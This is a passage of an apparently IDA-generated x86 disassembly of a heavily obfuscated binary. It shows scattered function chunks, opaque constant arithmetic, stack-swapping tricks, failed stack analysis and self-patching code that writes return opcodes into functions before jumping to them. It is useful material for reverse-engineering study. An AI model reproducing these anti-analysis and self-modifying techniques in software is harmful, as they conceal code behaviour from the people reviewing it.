; START OF FUNCTION CHUNK FOR sub_4431FF
loc_455339: ; CODE XREF: sub_4431FF+9j
mov edi, ecx
xchg edi, [esp+4+var_4]
cmp ds:dword_4487F0, 0
jnz loc_452077
jmp loc_454568
; END OF FUNCTION CHUNK FOR sub_4431FF
; ---------------------------------------------------------------------------
loc_455350: ; CODE XREF: ut7h7i2x:004584C6j
jbe loc_447A3C
mov ebx, 1A5847Fh
jmp sub_443B9F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_455360: ; CODE XREF: sub_43E592:loc_43A8EFj
mov al, [ebp-5]
pop ebx
pop ecx
loc_455365: ; CODE XREF: ut7h7i2x:loc_44FDECj
pop ecx
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_43E592
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4584D6
loc_455368: ; CODE XREF: sub_4584D6+1Dj
jmp nullsub_537
; END OF FUNCTION CHUNK FOR sub_4584D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FFB1
loc_45536D: ; CODE XREF: sub_43FFB1+104ABj
jmp loc_45042B
; END OF FUNCTION CHUNK FOR sub_43FFB1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44A030
loc_455372: ; CODE XREF: sub_44A030-2D09j
jmp loc_44BC7B
; END OF FUNCTION CHUNK FOR sub_44A030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E592
loc_455377: ; CODE XREF: sub_43E592+132DBj
add ebx, eax
push 9C177699h
jmp loc_452F34
; END OF FUNCTION CHUNK FOR sub_43E592
; =============== S U B R O U T I N E =======================================
sub_455383 proc near ; CODE XREF: sub_44879B+10j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043EA09 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043F796 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004465B5 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 004592E4 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045A7FB SIZE 0000000E BYTES
push ebx
mov ebx, ecx
xchg ebx, [esp+0]
push 0CD7DA496h
pop ecx
xor ecx, 0F0835242h
jmp loc_4592E4
sub_455383 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
mov [ebp+0], eax
and edx, ebx
sbb eax, 672355D3h
jmp loc_452EDD
; ---------------------------------------------------------------------------
sbb esi, 6F5B4A66h
jmp sub_44A5AB
; ---------------------------------------------------------------------------
loc_4553B5: ; DATA XREF: sub_4448AF+F2CEo
xchg ebx, [esp]
jmp sub_454ABB
; ---------------------------------------------------------------------------
jmp loc_44CDCD
; ---------------------------------------------------------------------------
push 758CCD29h
pop eax
add eax, 0B5B07713h
jb loc_459EC2
; START OF FUNCTION CHUNK FOR sub_4508DB
loc_4553D4: ; CODE XREF: sub_4508DB+Cj
jmp loc_44FEAD
; END OF FUNCTION CHUNK FOR sub_4508DB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5AB
loc_4553D9: ; CODE XREF: sub_44E5AB-555Dj
jmp loc_455C9C
; END OF FUNCTION CHUNK FOR sub_44E5AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457541
loc_4553DE: ; CODE XREF: sub_457541-132E6j
jmp loc_44EA03
; END OF FUNCTION CHUNK FOR sub_457541
; ---------------------------------------------------------------------------
mov ebx, ebp
popf
jmp loc_459EBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439B67
loc_4553EB: ; CODE XREF: sub_439B67+B4A5j
mov esi, edi
xchg esi, [esp+0Ch+var_C]
push 617CD634h
pop edi
jmp loc_4415B4
; END OF FUNCTION CHUNK FOR sub_439B67
; ---------------------------------------------------------------------------
loc_4553FB: ; DATA XREF: sub_452052+Ao
mov [edi], eax
pop edi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_4553FF: ; CODE XREF: sub_44E688-F0BAj
jmp loc_43AA9F
; END OF FUNCTION CHUNK FOR sub_44E688
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4469B9
loc_455404: ; CODE XREF: sub_4469B9+C5D6j
rol eax, 1Ah
push ecx
mov ecx, eax
call sub_448CAA
; END OF FUNCTION CHUNK FOR sub_4469B9
; START OF FUNCTION CHUNK FOR sub_4516C6
loc_45540F: ; CODE XREF: sub_4516C6+Ej
jmp loc_45482C
; END OF FUNCTION CHUNK FOR sub_4516C6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_390. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
popf
jmp sub_455775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44FDF2
loc_45541B: ; CODE XREF: sub_44FDF2+7j
call sub_442872
mov eax, [ebp-0Ch]
cmp eax, ds:dword_43AFB8
jz loc_44DB32
jmp loc_447EA4
; END OF FUNCTION CHUNK FOR sub_44FDF2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45410C
loc_455434: ; CODE XREF: ut7h7i2x:0044C238j
; sub_45410C:loc_44E976j
xor eax, 7E0EC848h
call sub_43AA94
push ebx
call sub_45AA08
; END OF FUNCTION CHUNK FOR sub_45410C
; START OF FUNCTION CHUNK FOR sub_4573BA
loc_455445: ; CODE XREF: sub_4573BA+1C28j
jmp loc_452292
; END OF FUNCTION CHUNK FOR sub_4573BA
; ---------------------------------------------------------------------------
loc_45544A: ; CODE XREF: ut7h7i2x:004507B5j
rol eax, 8
xor eax, 0F1ADFA84h
rol eax, 12h
add eax, 4C093E54h
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_45545C: ; CODE XREF: sub_43DBEC+BA7Bj
jmp loc_44524A
; END OF FUNCTION CHUNK FOR sub_43DBEC
; =============== S U B R O U T I N E =======================================
sub_455461 proc near ; CODE XREF: sub_43DBEC:loc_43F183p
; ut7h7i2x:0044AF04j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00454E30 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00455EEB SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00458DFE SIZE 00000005 BYTES
xchg eax, [esp+0]
pop eax
xor eax, 40C08C38h
xchg eax, [esp-4+arg_0]
jmp loc_455EEB
sub_455461 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439D5C
loc_455473: ; CODE XREF: sub_439D5C+9995j
ror ebx, 1Bh
adc esi, ebx
sbb ebp, esi
jmp loc_43FC6F
; END OF FUNCTION CHUNK FOR sub_439D5C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4402A5
loc_45547F: ; CODE XREF: sub_4402A5+19B86j
push esi
loc_455480: ; CODE XREF: sub_4402A5:loc_4460C3j
call sub_458CD2
loc_455485: ; CODE XREF: sub_4438BC+9j
jmp loc_44A48D
; END OF FUNCTION CHUNK FOR sub_4402A5
; =============== S U B R O U T I N E =======================================
sub_45548A proc near ; CODE XREF: ut7h7i2x:0043CC53j
; ut7h7i2x:0044CA9Fp
xchg ebx, [esp+0]
pop ebx
lea eax, nullsub_524
mov byte ptr [eax], 0C3h
jmp nullsub_524
sub_45548A endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_45549C: ; CODE XREF: ut7h7i2x:00444C76j
add esi, 0ACA1E6E5h
; =============== S U B R O U T I N E =======================================
sub_4554A2 proc near ; CODE XREF: ut7h7i2x:00451B70p
xchg edi, [esp+0]
pop edi
pop ebp
retn
sub_4554A2 endp ; sp-analysis failed
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_528. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B847
loc_4554A9: ; CODE XREF: sub_43B847+D554j
jmp loc_45982E
; END OF FUNCTION CHUNK FOR sub_43B847
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_450FDE
loc_4554AE: ; CODE XREF: sub_450FDE-F712j
jmp loc_43C062
; END OF FUNCTION CHUNK FOR sub_450FDE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A92F
loc_4554B3: ; CODE XREF: sub_43A92F+24D2j
jmp loc_43C01D
; END OF FUNCTION CHUNK FOR sub_43A92F
; ---------------------------------------------------------------------------
loc_4554B8: ; CODE XREF: ut7h7i2x:004393A8j
jmp sub_44B01F
; =============== S U B R O U T I N E =======================================
sub_4554BD proc near ; CODE XREF: sub_453790-127B7p
; sub_44A33F:loc_441729j ...
js sub_452CBB
push ebp
jmp loc_4573C9
sub_4554BD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_4554C9: ; CODE XREF: sub_439BF8:loc_44D522j
jz loc_442700
jmp loc_455662
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
push ebx
jmp sub_458345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449E96
loc_4554DA: ; CODE XREF: sub_449E96+10D93j
and eax, 20A3A24h
loc_4554E0: ; CODE XREF: sub_449E96:loc_44D91Bj
push 9A7DF0D1h
pop eax
and eax, ds:4000F7h
jmp loc_44B76B
; END OF FUNCTION CHUNK FOR sub_449E96
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459653
loc_4554F1: ; CODE XREF: sub_459653:loc_442CE1j
pop edx
sub edx, 0D1C3C09Bh
and edx, 4375EB66h
; END OF FUNCTION CHUNK FOR sub_459653
; START OF FUNCTION CHUNK FOR sub_441765
loc_4554FE: ; CODE XREF: sub_441765:loc_4539E1j
add edx, 0BD1429AEh
xchg edx, [esp-4+arg_0]
jmp sub_43AA94
; END OF FUNCTION CHUNK FOR sub_441765
; ---------------------------------------------------------------------------
loc_45550C: ; CODE XREF: ut7h7i2x:0044B296j
jg loc_449420
; START OF FUNCTION CHUNK FOR sub_4518D7
loc_455512: ; CODE XREF: sub_4518D7-12B6Dj
rol ebx, 13h
xor ebx, 8A851CC2h
add ebx, 2AE8F6EBh
xchg ebx, [esp+0]
jmp sub_453D8B
; END OF FUNCTION CHUNK FOR sub_4518D7
; ---------------------------------------------------------------------------
push 4C25FF1h
xchg ebx, [esp]
mov edx, ebx
pop ebx
jmp loc_43EED5
; ---------------------------------------------------------------------------
push esi
push 1AC5A331h
pop esi
and esi, ds:4000F5h
sub esi, 4221E40Dh
add esi, 9114DFC7h
sub eax, esi
jmp loc_43A8AD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B68
loc_455559: ; CODE XREF: sub_440B68:loc_4460FFj
add edx, 0DA4E6A5Eh
test edx, 800000h
jmp loc_43E370
; END OF FUNCTION CHUNK FOR sub_440B68
; ---------------------------------------------------------------------------
loc_45556A: ; CODE XREF: ut7h7i2x:00442F4Bj
add eax, ecx
xor eax, esi
add eax, edi
add al, ah
; START OF FUNCTION CHUNK FOR sub_44871F
loc_455572: ; CODE XREF: sub_44871F:loc_43FF1Bj
and eax, 7
push edi
push 0A3B4AF03h
jmp loc_44A5FD
; END OF FUNCTION CHUNK FOR sub_44871F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_22. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jb loc_45A1CF
mov eax, [esp]
push edi
mov edi, ebx
xchg edi, [esp]
mov ebx, edx
jmp loc_44E862
; =============== S U B R O U T I N E =======================================
sub_455597 proc near ; CODE XREF: ut7h7i2x:0043A002j
; ut7h7i2x:0045100Fp
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043A40A SIZE 00000024 BYTES
; FUNCTION CHUNK AT 0043D303 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00444E81 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AEDD SIZE 00000017 BYTES
xchg ecx, [esp+0]
pop ecx
mov eax, [esp-4+arg_0]
push edx
call sub_4439B0
mov eax, 0A7A44D83h
call sub_43AA94
jmp loc_43A40A
sub_455597 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
or eax, 6FD7C25h
jmp sub_45AB7D
; ---------------------------------------------------------------------------
loc_4555BE: ; CODE XREF: ut7h7i2x:0044A089j
jb loc_43E659
rol eax, 8
test esi, ebx
jmp loc_447FD2
; =============== S U B R O U T I N E =======================================
sub_4555CE proc near ; CODE XREF: ut7h7i2x:00445812p
; ut7h7i2x:00456218j
; FUNCTION CHUNK AT 00448522 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004537FE SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045918F SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045995B SIZE 0000000B BYTES
xchg edx, [esp+0]
pop edx
mov edx, [ebp-4]
imul byte ptr [edx]
cmp al, 0A4h
jz loc_4592FE
jmp loc_45995B
sub_4555CE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4555E4: ; DATA XREF: sub_4565F6+Fo
push 0BB2AE278h
pop eax
add eax, ds:4000F5h
jb loc_44DF2C
loc_4555F6: ; CODE XREF: ut7h7i2x:0044158Ej
jmp loc_443E53
; ---------------------------------------------------------------------------
popf
xor eax, ebx
or esi, 0D0F4E2F9h
jmp loc_44DF2C
; ---------------------------------------------------------------------------
db 0Fh, 88h, 0EBh
dd 0E9FFFF9Ch, 0FFFFA32Fh, 49D6FB81h, 1AE96759h
db 92h, 0FEh, 0FFh
; ---------------------------------------------------------------------------
loc_45561F: ; CODE XREF: ut7h7i2x:0043DC50j
shr esi, 17h
push edx
jmp loc_440138
; ---------------------------------------------------------------------------
pop esi
mov [ebx], esi
jmp sub_45AAD1
; ---------------------------------------------------------------------------
jmp ds:off_41D014
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4596FF
loc_455636: ; CODE XREF: sub_4596FF+9j
jmp nullsub_388
; END OF FUNCTION CHUNK FOR sub_4596FF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459070
loc_45563B: ; CODE XREF: sub_459070-158ABj
jmp loc_4598C6
; END OF FUNCTION CHUNK FOR sub_459070
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449957
loc_455640: ; CODE XREF: ut7h7i2x:0043A1B5j
; sub_449957-99D2j ...
js loc_452D9B
xchg esi, [esp+4+var_4]
mov edx, esi
pop esi
mov eax, [esp+0]
push edi
mov edi, edx
jmp loc_4499B4
; END OF FUNCTION CHUNK FOR sub_449957
; ---------------------------------------------------------------------------
loc_455657: ; CODE XREF: ut7h7i2x:loc_454160j
add edi, 85038599h
call sub_446996
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_455662: ; CODE XREF: sub_439BF8+1B8D7j
jmp loc_4520C2
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4552AC
loc_455667: ; CODE XREF: sub_4552AC+8j
jmp loc_453822
; END OF FUNCTION CHUNK FOR sub_4552AC
; ---------------------------------------------------------------------------
loc_45566C: ; CODE XREF: ut7h7i2x:00440690j
jmp loc_4483AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_444851
loc_455671: ; CODE XREF: sub_444851:loc_444F04j
push ecx
push 98B9194Dh
pop ecx
add ecx, 1DE7E780h
xor ecx, 0B6A100C9h
jmp loc_440BDF
; END OF FUNCTION CHUNK FOR sub_444851
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_455B51
loc_455689: ; CODE XREF: sub_455B51+Aj
push offset sub_45A71D
jmp loc_43AFC7
; END OF FUNCTION CHUNK FOR sub_455B51
; ---------------------------------------------------------------------------
loc_455693: ; CODE XREF: ut7h7i2x:loc_44B968j
or eax, 81E82EDAh
jnp loc_45517E
cmp ebx, ebp
jmp loc_43D2DB
; ---------------------------------------------------------------------------
loc_4556A6: ; DATA XREF: ut7h7i2x:0043E9BEo
push edi
mov edi, eax
xchg edi, [esp]
ror eax, 5
mov ds:dword_443750, eax
retn
; ---------------------------------------------------------------------------
loc_4556B6: ; CODE XREF: ut7h7i2x:0045016Ej
jmp loc_4495EF
; ---------------------------------------------------------------------------
loc_4556BB: ; CODE XREF: ut7h7i2x:00444C3Cj
jmp loc_45AA71
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_4556C0: ; CODE XREF: sub_44B68F+6j
rol eax, 5
push ebp
jmp loc_43DCEC
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45967C
loc_4556C9: ; CODE XREF: ut7h7i2x:0043EB2Bj
; sub_45967C:loc_44CD53j
jnz loc_44234B
jmp loc_449ABD
; END OF FUNCTION CHUNK FOR sub_45967C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4503C3
loc_4556D4: ; CODE XREF: sub_4503C3:loc_451B8Fj
mov eax, ds:dword_43C440
or eax, eax
jnz loc_459915
jmp loc_4501DD
; END OF FUNCTION CHUNK FOR sub_4503C3
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_121. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440CEC
loc_4556E8: ; CODE XREF: sub_440CEC-3A38j
jmp loc_449F9B
; END OF FUNCTION CHUNK FOR sub_440CEC
; ---------------------------------------------------------------------------
loc_4556ED: ; CODE XREF: ut7h7i2x:0044E59Bj
jns loc_448989
; START OF FUNCTION CHUNK FOR sub_43C0DA
loc_4556F3: ; CODE XREF: sub_43C0DA:loc_44E580j
sub ecx, 81A64D91h
rol ecx, 1Ah
add ecx, 56ACAD0Bh
xchg ecx, [esp-4+arg_0]
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_43C0DA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4497C1
loc_45570A: ; CODE XREF: sub_4497C1:loc_4470D6j
mov eax, [esp+4+var_4]
push edi
not edi
jmp loc_4397BA
; END OF FUNCTION CHUNK FOR sub_4497C1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D021
loc_455715: ; CODE XREF: sub_43D021+CCD6j
xor ecx, edi
or edx, eax
loc_455719: ; CODE XREF: sub_43D021:loc_4570A5j
mov eax, 62h
call sub_4448AF
jmp loc_44ED03
; END OF FUNCTION CHUNK FOR sub_43D021
; ---------------------------------------------------------------------------
jmp loc_454E55
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4408C2
loc_45572D: ; CODE XREF: sub_4408C2+3C51j
cmp dword ptr [eax], 4742444Fh
jz loc_456EB1
jmp loc_43E526
; END OF FUNCTION CHUNK FOR sub_4408C2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F7A5
loc_45573E: ; CODE XREF: sub_43F7A5+F6D5j
; sub_45292B:loc_45625Cj
xchg eax, [esp-4+arg_0]
mov ecx, eax
pop eax
loc_455744: ; CODE XREF: ut7h7i2x:00445E44j
xchg ebx, [esp+0]
mov ebp, ebx
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_43F7A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_445DB4
loc_45574B: ; CODE XREF: sub_445DB4+9A89j
jmp loc_455D62
; END OF FUNCTION CHUNK FOR sub_445DB4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457818
loc_455750: ; CODE XREF: sub_457818-128B9j
push edi
pushf
push 3849FEA7h
pop edi
rol edi, 2
xor edi, 2DF9888Fh
jmp loc_44FB32
; END OF FUNCTION CHUNK FOR sub_457818
; ---------------------------------------------------------------------------
mov ecx, ebx
jmp sub_44C8F3
; ---------------------------------------------------------------------------
cdq
test esi, edx
jmp loc_44C5D3
; =============== S U B R O U T I N E =======================================
sub_455775 proc near ; CODE XREF: sub_43A556:loc_43EE42p
; ut7h7i2x:00455416j
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043E9FE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442564 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00446E31 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00449D36 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044AD01 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BC94 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C91C SIZE 0000000F BYTES
xchg ecx, [esp+0]
pop ecx
jo loc_44C91C
cmp dword ptr [ebp-4], 5
loc_455783: ; CODE XREF: sub_43C9F5:loc_44BA13j
jnz loc_439408
jmp loc_44AD01
sub_455775 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C99C
loc_45578E: ; CODE XREF: sub_44C99C+380Cj
or eax, 8A4B7984h
xchg eax, [ebp+0]
adc ebp, 0A54C3842h
rol esi, 12h
jmp loc_45747B
; END OF FUNCTION CHUNK FOR sub_44C99C
; =============== S U B R O U T I N E =======================================
sub_4557A5 proc near ; DATA XREF: sub_4589C7:loc_443E49o
arg_0 = dword ptr 4
xchg ebx, [esp+0]
push ebx
pop eax
pop ebx
xchg edi, [esp-4+arg_0]
jmp loc_4590EA
sub_4557A5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push 0E2D9D39Dh
pop eax
sub eax, 6A885F26h
xor eax, 61BCBC54h
call sub_43AA94
push ecx
jmp loc_455C5B
; ---------------------------------------------------------------------------
push ebx
push 761925Dh
pop ebx
add ebx, 6043A466h
and ebx, 96AF95C0h
add ebx, 0F99CBBECh
jmp loc_456334
; ---------------------------------------------------------------------------
loc_4557EE: ; CODE XREF: ut7h7i2x:0043F1D6j
add edx, 2C394725h
loc_4557F4: ; CODE XREF: ut7h7i2x:loc_445FFFj
mov eax, [esp]
call sub_4594B7
loc_4557FC: ; CODE XREF: ut7h7i2x:00444C94j
; ut7h7i2x:00446533j
xchg eax, [esp]
mov edx, eax
push ebx
jmp loc_44E1E9
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_455807 proc near ; CODE XREF: sub_451A5A-16966p
; sub_43F3D1:loc_43F3DCj ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 00439C13 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00439C58 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043AFFD SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0043B0B3 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0043CC13 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043E539 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004406C4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004425F7 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00444DCE SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00444F9B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445B54 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D5D1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044E7DC SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453DED SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00456E2D SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00457BF5 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00458534 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045A13E SIZE 00000005 BYTES
push ebp
mov ebp, esp
call sub_44749D
loc_45580F: ; DATA XREF: sub_43D87A+CD27o
mov ebp, esp
push ecx
mov [ebp+var_4], eax
mov eax, [ebp+var_4]
mov al, [eax]
jo loc_444DCE
sub al, 99h
push 54A4B499h
jmp loc_457BF5
sub_455807 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
xchg edi, eax
jmp sub_44B50D
; ---------------------------------------------------------------------------
loc_455833: ; CODE XREF: ut7h7i2x:loc_43BD04j
call sub_45444E
mov ds:dword_43AFB8, eax
push offset loc_4517C2
jmp locret_459467
; ---------------------------------------------------------------------------
loc_455847: ; CODE XREF: ut7h7i2x:0043F942j
jle loc_44FBAB
mov edx, [edi]
; START OF FUNCTION CHUNK FOR sub_45A25C
loc_45584F: ; CODE XREF: sub_45A25C:loc_43BDC3j
xor ecx, 163AD422h
or ecx, 74B6949Fh
add ecx, 3621B415h
sub eax, ecx
pop ecx
jmp loc_45309E
; END OF FUNCTION CHUNK FOR sub_45A25C
; ---------------------------------------------------------------------------
loc_455869: ; CODE XREF: ut7h7i2x:00447B37j
add esi, 801BFB5Dh
push offset sub_43FB6D
jmp loc_4574E5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_455879: ; CODE XREF: sub_43DBEC:loc_450785j
rol edx, 17h
or edx, 0DCAFA330h
add edx, 153AAB9h
xchg edx, [esp+4+var_4]
jmp loc_453F45
; END OF FUNCTION CHUNK FOR sub_43DBEC
; ---------------------------------------------------------------------------
loc_455890: ; CODE XREF: ut7h7i2x:0044E57Bj
mov edx, 57FEB95Bh
; START OF FUNCTION CHUNK FOR sub_4487B0
loc_455895: ; CODE XREF: sub_4487B0:loc_44E55Aj
add ebx, 10496048h
xchg ebx, [esp+4+var_4]
jmp sub_44A833
; END OF FUNCTION CHUNK FOR sub_4487B0
; ---------------------------------------------------------------------------
mov ds:off_41D084, eax
lea eax, loc_43AD92
mov byte ptr [eax], 0C3h
jmp loc_43AD92
; =============== S U B R O U T I N E =======================================
sub_4558B7 proc near ; CODE XREF: sub_409E64+194p
; sub_40D20A+212p ...
call sub_4558CC
jmp ds:off_41D088
sub_4558B7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4533DE
loc_4558C2: ; CODE XREF: sub_4533DE+Ej
jmp loc_445BF1
; END OF FUNCTION CHUNK FOR sub_4533DE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44064B
loc_4558C7: ; CODE XREF: sub_44064B+7046j
jmp loc_43FA06
; END OF FUNCTION CHUNK FOR sub_44064B
; =============== S U B R O U T I N E =======================================
sub_4558CC proc near ; CODE XREF: sub_4558CC:loc_452378j
; ut7h7i2x:00454489j ...
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 0043B30C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 00442D83 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D5F8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00452378 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453889 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045448E SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004551AD SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455EA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456A0F SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00458EF9 SIZE 00000008 BYTES
jno loc_45448E
jmp loc_44D5F8
sub_4558CC endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_4558D7 proc near ; DATA XREF: sub_452C82:loc_44CD7Ao
mov eax, ds:dword_442EA8
push offset sub_4580B3
jmp nullsub_228
sub_4558D7 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A3F9
loc_4558E7: ; CODE XREF: sub_45A3F9+Dj
xor eax, 0E8F82AFFh
; END OF FUNCTION CHUNK FOR sub_45A3F9
; =============== S U B R O U T I N E =======================================
sub_4558ED proc near ; CODE XREF: ut7h7i2x:0043A59Fp
xchg edx, [esp+0]
pop edx
push 94CC7D36h
pop eax
add eax, 83DEE3B5h
jmp loc_445AAF
sub_4558ED endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_455902: ; CODE XREF: ut7h7i2x:0043B03Cj
jle loc_43A285
adc eax, 78781B5Dh
push edi
xchg ebp, ecx
mov edi, [esi]
jmp loc_443576
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FD68
loc_455918: ; CODE XREF: sub_43FD68+16A6Ej
call sub_4414E8
; END OF FUNCTION CHUNK FOR sub_43FD68
; START OF FUNCTION CHUNK FOR sub_4459EE
loc_45591D: ; CODE XREF: sub_4459EE+11j
jmp loc_44E1B3
; END OF FUNCTION CHUNK FOR sub_4459EE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B43D
loc_455922: ; CODE XREF: sub_44B43D:loc_4496B2j
jl loc_43B3FA
mov edi, 0D989B292h
test edx, 3801BCBDh
jmp loc_440220
; END OF FUNCTION CHUNK FOR sub_44B43D
; ---------------------------------------------------------------------------
loc_455938: ; CODE XREF: ut7h7i2x:004420F6j
; ut7h7i2x:loc_44E476j
push 0
push 0
push 10h
mov eax, [ebp+8]
; START OF FUNCTION CHUNK FOR sub_456111
loc_455941: ; CODE XREF: sub_456111:loc_441A83j
push eax
call sub_43F3D1
call sub_447E29
; END OF FUNCTION CHUNK FOR sub_456111
; START OF FUNCTION CHUNK FOR sub_45499E
loc_45594C: ; CODE XREF: sub_45499E+5j
jmp nullsub_230
; END OF FUNCTION CHUNK FOR sub_45499E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_446151
loc_455951: ; CODE XREF: sub_446151+7j
jmp loc_44EC07
; END OF FUNCTION CHUNK FOR sub_446151
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44445F
loc_455956: ; CODE XREF: sub_44445F+126F4j
jz loc_44E7F8
